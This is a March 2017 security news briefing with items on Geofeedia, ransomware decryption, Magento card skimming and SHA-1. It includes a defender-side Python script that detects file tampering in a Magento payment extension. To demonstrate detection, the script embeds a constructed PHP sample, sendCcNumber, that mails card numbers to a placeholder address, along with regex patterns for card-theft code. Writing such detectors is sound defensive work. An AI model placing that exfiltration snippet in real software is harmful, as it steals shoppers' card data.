Security Briefing 3.15.17
On Monday, Facebook, which owns Instagram, announced that it had updated its rules to clearly explain that developers can’t “use data obtained from us to provide tools that are used for surveillance”. In October, the American Civil Liberties Union (ACLU) published a report about police monitoring of activists and protesters with one particular app – called Geofeedia – that had been tapping into Twitter, Facebook and Instagram APIs to create real-time maps of social media activity in protest areas. Those maps have been used to identify, and in some cases arrest, protesters shortly after their posts became public.
Is Mentorship the Key to Recruiting Women to Cybersecurity? A new ISACA survey identifies the biggest barriers faced by women in tech. Topping the list is a lack of mentors, cited by 48% of participants; a lack of female role models (42%) and gender bias in the workplace (39%) were the second and third top barriers.
macOS users who had their systems infected with the FindZip ransomware can now use a decryption tool to restore their files without paying the ransom. A link to the decryption tool is here. This ransomware was spotted in the wild early last month.
Cybercriminals have been abusing a payment module to steal credit card data from online shops powered by the Magento ecommerce platform, web security firm Sucuri reported on Friday. The targeted module is the Realex Payments Magento extension (SF9). The extension itself is not vulnerable, but hackers added a malicious function called sendCcNumber() to an SF9 file named Remote.php that abuses the way the extension operates and sends CC info to an email address owned by the hackers.
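The Magento case above is a file-tampering problem, so the practical defence is a baseline of known-good file hashes plus an indicator scan of anything that changed. The following is an added example written for this briefing, not code from Sucuri, Realex or Magento: it snapshots a constructed stand-in for the extension directory, tampers with a fake Remote.php the way the report describes, and shows the diff and indicator hits a shop operator would act on. The directory layout, file contents, the REDACTED mailbox and the second (mail-next-to-card-field) pattern are all constructed assumptions; only the sendCcNumber name comes from the report.

```python
"""
Added example (not Sucuri's, Realex's or Magento's code): a defender-side
integrity and indicator scan for a Magento extension directory, modelled on the
SF9 case in which a malicious sendCcNumber() was added to Remote.php.
Paths, file contents and the mail()-pattern indicator are constructed for this demo.
"""
import hashlib
import os
import re
import tempfile

# Indicators of tampering in a payment extension. The sendCcNumber name is from
# the Sucuri report; the second pattern is a constructed generalisation of
# "a mail() call handling card fields in the same statement".
INDICATORS = [
    re.compile(r"\bfunction\s+sendCcNumber\b"),
    re.compile(r"\b(?:mail|mb_send_mail)\s*\([^;]*(?:cc_number|cc_cid|cc_exp)", re.I),
]


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map every file under root (slash-separated relative path) to its SHA-256.
    Run this on a freshly installed, known-good extension and store the result."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def diff_against_baseline(root, baseline):
    """Return sorted lists (modified, added, removed) of relative paths."""
    current = build_baseline(root)
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return modified, added, removed


def scan_indicators(path):
    """Return the indicator patterns that match a file's contents (heuristic; triage by hand)."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        text = f.read()
    return [pat.pattern for pat in INDICATORS if pat.search(text)]


def write(root, rel, content):
    """Helper: write a constructed file below root, creating directories as needed."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as f:
        f.write(content)


CLEAN_REMOTE = """<?php
// Constructed stand-in for the extension's Remote.php (not the real file).
class Realex_Remote {
    public function authorise($order) { return $this->post($order); }
}
"""

# Constructed indicator sample: the kind of addition the report describes.
TAMPERED_REMOTE = CLEAN_REMOTE + """
function sendCcNumber($cc_number) { mail('REDACTED@example.invalid', 'cc', $cc_number); }
"""


def demo():
    """Install a clean copy, snapshot it, tamper with Remote.php, then detect it."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "Model/Remote.php", CLEAN_REMOTE)
        write(root, "etc/config.xml", "<config/>\n")
        baseline = build_baseline(root)          # taken while the install is known-good
        write(root, "Model/Remote.php", TAMPERED_REMOTE)
        write(root, "Model/Dropper.php", "<?php // constructed new file\n")
        modified, added, removed = diff_against_baseline(root, baseline)
        hits = {p: scan_indicators(os.path.join(root, p)) for p in modified + added}
        return modified, added, removed, hits


if __name__ == "__main__":
    m, a, r, h = demo()
    print("modified:", m, "added:", a, "removed:", r)
    for p, hit in h.items():
        print(p, "->", hit or "no indicator")
```

The baseline should be stored off the web server (an attacker who can edit Remote.php can edit a local manifest too), and the indicator list is deliberately narrow: a file that changed without a corresponding deployment is the real signal, and the pattern scan only helps prioritise which changed files to read first.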
The number of new malware variants that emerged in February 2017 was three times higher compared to January, nearly reaching the record-high levels registered in October 2016, Symantec reports. Last month the security company registered 94.1 million malware variants, which marks a worrying increase when compared to the 32.9 million seen in January and only 19.5 million in December.
Many high-profile Twitter accounts have been hijacked in an attack apparently motivated by the recent diplomatic dispute between Turkey and the Netherlands, including ones belonging to high profile organizations such as Amnesty International, the European Parliament, Duke University, UNICEF USA, Forbes, Reuters Japan, and BBC North America. The tweets were in Turkish referencing Nazi Germany. Most have had their accounts restored.
Microsoft has released a total of 18 security bulletins to address tens of vulnerabilities, including more than a dozen that have already been publicly disclosed or exploited in attacks. The March 2017 updates also include the patches that should have been released last month. Microsoft postponed most of the February security updates – except the updates that fixed Flash Player flaws – due to an unspecified “last minute issue.”
It took Google two years, in conjunction with the Netherlands’ National Research Institute for Mathematics and Computer Science, but they successfully attacked the SHA-1 cryptographic algorithm. This is a widely used cryptographic hash algorithm. Like, wiiiiiidely.